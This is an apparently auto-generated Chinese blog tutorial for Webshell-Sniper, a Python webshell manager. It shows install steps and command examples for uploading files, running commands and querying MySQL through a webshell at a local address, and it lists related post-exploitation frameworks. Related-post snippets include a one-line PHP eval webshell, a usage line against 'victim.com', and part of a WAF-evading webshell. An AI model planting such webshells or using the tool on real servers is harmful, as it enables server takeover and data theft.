Webshell-Sniper 使用教程

于 2024-08-16 08:46:42 发布
阅读量620 收藏 6
点赞数 19
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00238/article/details/141243203
版权

Webshell-Sniper 使用教程

Webshell-Sniper:hammer: Manage your website via terminal项目地址:https://gitcode.com/gh_mirrors/we/Webshell-Sniper

项目介绍

Webshell-Sniper 是一款由 Python 编写的 webshell 管理器,支持文件管理、命令执行、数据库管理、端口扫描、反弹 Shell 等功能。该项目由王一航开发,但目前已停止更新。项目地址为:https://github.com/WangYihang/Webshell-Sniper

项目快速启动

安装

首先,克隆项目到本地:

git clone https://github.com/WangYihang/Webshell-Sniper.git

进入项目目录:

cd Webshell-Sniper

安装所需的依赖:

pip install -r requirements.txt

使用示例

以下是一个简单的使用示例:

python webshell-sniper.py http://127.0.0.1/c.php POST c

应用案例和最佳实践

文件管理

Webshell-Sniper 可以用于远程管理服务器上的文件,包括上传、下载、删除等操作。例如,上传一个文件到服务器:

python webshell-sniper.py http://127.0.0.1/c.php POST c --upload local_file.txt remote_file.txt

命令执行

通过 Webshell-Sniper 可以在远程服务器上执行命令,例如查看当前目录下的文件:

python webshell-sniper.py http://127.0.0.1/c.php POST c --exec "ls -la"

数据库管理

Webshell-Sniper 支持数据库管理功能,可以用于连接和操作远程数据库。例如,连接到 MySQL 数据库并执行查询:

python webshell-sniper.py http://127.0.0.1/c.php POST c --db mysql --host localhost --user root --password root --query "SHOW DATABASES;"

典型生态项目

Metasploit

Metasploit 虽不是一款 Webshell 网站管理工具,但已具备文件管理、命令执行等功能,支持 ASPX、PHP、JSP 等脚本类型。项目地址:https://github.com/rapid7/metasploit-framework

PhpSploit

PhpSploit 是一个由 Python 编写的后渗透利用框架,支持在 Win/Linux/Mac 等平台执行,对 HTTP 头数据进行混淆处理,并利用小型后门实现隐蔽通信。项目地址:https://github.com/nil0x42/phpsploit

SharPyShell

SharPyShell 是一个由 Python 编写的后渗透框架,用于 C# Web 应用程序的小型混淆版 ASP.NET WebShell,仅支持在 .NET Framework >= 2.0 上运行。项目地址:https://github.com/antonioCoco/SharPyShell

以上是 Webshell-Sniper 的使用教程,希望能帮助您快速上手并了解其应用场景和生态项目。

Webshell-Sniper:hammer: Manage your website via terminal项目地址:https://gitcode.com/gh_mirrors/we/Webshell-Sniper

宗隆裙
关注
渗透系列:Webshell的介绍及工具的使用(web安全系列)
weixin_54626591的博客
01-14 151
Webshell的介绍及工具的使用(web安全系列)
23个常见Webshell网站管理工具
weixin_54787877的博客
03-20 5359
注 文章来源:“潇湘信安”公众号 这篇文章笔者整理了目前所见到过的大部分Webshell网站管理工具,这里只对这些工具做了简单介绍,并没有写具体使用方式,大家如果有兴趣可以自己去看一下使用说明,同时也欢迎大家补充一些类似工具。 目前国内安全人员常用的有:中国菜刀、中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。 (1) 中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚
Webshell-Sniper 项目使用教程
gitblog_00221的博客
08-16 707
Webshell-Sniper 项目使用教程 Webshell-Sniper:hammer: Manage your website via terminal项目地址:https://gitcode.com/gh_mirrors/we/Webshell-Sniper 1. 项目的目录结构及介绍 Webshell-Sniper 项目的目录结构如下: Webshell-Sniper/ ├── cor...
常用的WebShell管理工具
美奇软件开发工作室
10-13 2973
1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 官网:http://www.maicaidao.co/ 2、蚁剑(AntSword) AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。 github项目地址:https://
Webshel​​l-Sniper:通过终端管理您的网站
03-03
Webshel​​l狙击手 通过终端的webshel​​l管理器 用法 : Usage : python webshell-sniper.py [URL] [METHOD] [AUTH] Example : python webshell-sniper.py http://127.0.0.1/c.php POST c Author : WangYihang <wangyihanger> # cat /var/www/html/index.php <?php eval($_POST['s3cr3t']);?> # python webshell-sniper.py http://victim.com/index.php POST s3cr3t ... 安装: git clone https://github.com
常见的WebShell管理工具
Daoke37的博客
03-23 643
常见的WebShell管理工具 1.中国菜刀 2.蚁剑(AntSword) 3.C刀(Cknife) 4.冰蝎(Behinder) 5.Xise 6.Altman 7.Weevely 8.QuasiBot 9.Webshell-Sniper 10.WebshellManager
Linux下查杀webshell木马的工具.zip
01-05
Webshell-Sniper的使用流程一般包括安装、配置、扫描和处理结果,其提供的报告可以帮助管理员了解详细的扫描情况和处理建议。 在实际操作中,使用这些工具需要注意以下几点: - **权限管理**:确保在运行工具时拥有...
2024年网络安全最新网络安全-webshell详解(原理、攻击、检测与防御)
2401_84240129的博客
05-02 1049
Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马,一般分为大马、小马、一句话木马。大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell
webshell管理工具
08-25
Webshell-Sniper是一个使用Python语言编写的webshell管理器,它支持文件管理、命令执行、数据库管理、端口扫描和反弹Shell等功能。不过,该项目已经停止更新了。 这些工具都提供了一系列功能,以便于管理和操作...
21.使用BurpSuite破解Webshell密码
weixin_44023460的博客
02-05 510
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。BurpSuite需要JAVA支持,请先安装JAVA环境。在kali及PentestBox默认集成了BurpSuite,BurpSuite是一款强大的渗透辅助测试工具,在本例中主要介绍如何利用其“入侵”功能来破解别人的webshell,当然也可以用BurpSuite来扫描
渗透利器 | 常见的 WebShell 管理工具
喜欢Python编程的程序员柚柚呀
11-28 2023
攻击者在入侵网站时,通常要通过各种方式写入 Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。本文介绍十款常用的 Webshell 管理工具,以供你选择,你会选择哪一个?中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE 方式编译,支持多国语言输入显示。
应急响应实战笔记——权限维持篇:⑦ 常见WebShell管理工具
君逍遥o
04-07 500
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。
使用Python编写webshell及防范措施
theoxiong的博客
07-17 617
在渗透测试和网络安全领域,Webshell是一种用于远程控制和管理受害服务器的工具。Webshell通常是一个脚本,通过网页服务器提供的服务来执行命令和操作文件系统。在这篇博客中,我们将深入探讨如何使用Python编写一个简单的Webshell,并详细分析其工作原理。同时,我们还会讨论一些重要的安全措施,以防止服务器被Webshell攻击。一、pandas是什么?Webshell是一个小型的服务器端脚本,通常嵌入在被攻击的Web服务器上。
渗透利器 | 常见的WebShell管理工具
03-02 2万+
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,然后再执行系统命令、权限提升、读取配置文件、窃取用户数据,篡改网站页面等操作。本文介绍十款常用的We...
最新webshell大合集
热门推荐
帮助别人等于帮助自己 ——MXi4oyu
09-01 3万+
收集与整理了各种webshell,以便在日后的项目中做Webshell检测训练。 https://github.com/tennc/webshell   各种webshell集合 https://github.com/ysrc/webshell-sample webshell样本 https://github.com/xl7dev/WebShell Webshe
最近服务器总被webshell攻击,木马也非常猖獗
weixin_42287925的博客
04-07 3072
木马猖獗到无视各种防火墙,各种付费云防护。(我好像无意中发现了致富的新途径,想转行了,开玩笑了)。以下是服务器上下载下来的木马源文件: <?php $password='admin';//登录密码 //本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。 //功能特色:PHP高版本低版本都能执行,文件短小精悍,方便上传,功能强大,提权无痕迹,无视waf,过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。 $html='$
javaweb项目进销存管理系统springboot+vue+redis idea导入 mysql数据库-java课程设计毕业设
10-18
该系统采用Spring Boot作为后端框架,Vue.js作为前端技术,集成Redis进行缓存管理,并使用MySQL数据库进行数据存储。此项目旨在为在校大学生的Java课程设计和毕业设计提供全面的学习参考与实践指导,同时为Java技术爱好者提供丰富的学习资料。帮助用户深入理解进销存管理系统的设计思路与实现方法。通过该源码,开发者可以掌握Spring Boot、Vue.js、Redis和MySQL的结合使用,提升全栈开发能力,是学习Java开发的重要实践材料,适合于进行个人项目或课程作业参考。
毕业设计论文SpringBoot助学兼职系统.docx
最新发布
10-18
毕业设计论文
网络收集的高效webshell工具-demodata.php
- 使用专业的Web应用防火墙(WAF)来检测和阻断恶意请求和WebShell攻击。 - 对网站代码进行安全审计,查找可能存在的漏洞并及时修补。 4. PHP WebShell的特征: - 通常包含执行系统命令的函数,如`system()`, `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

宗隆裙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值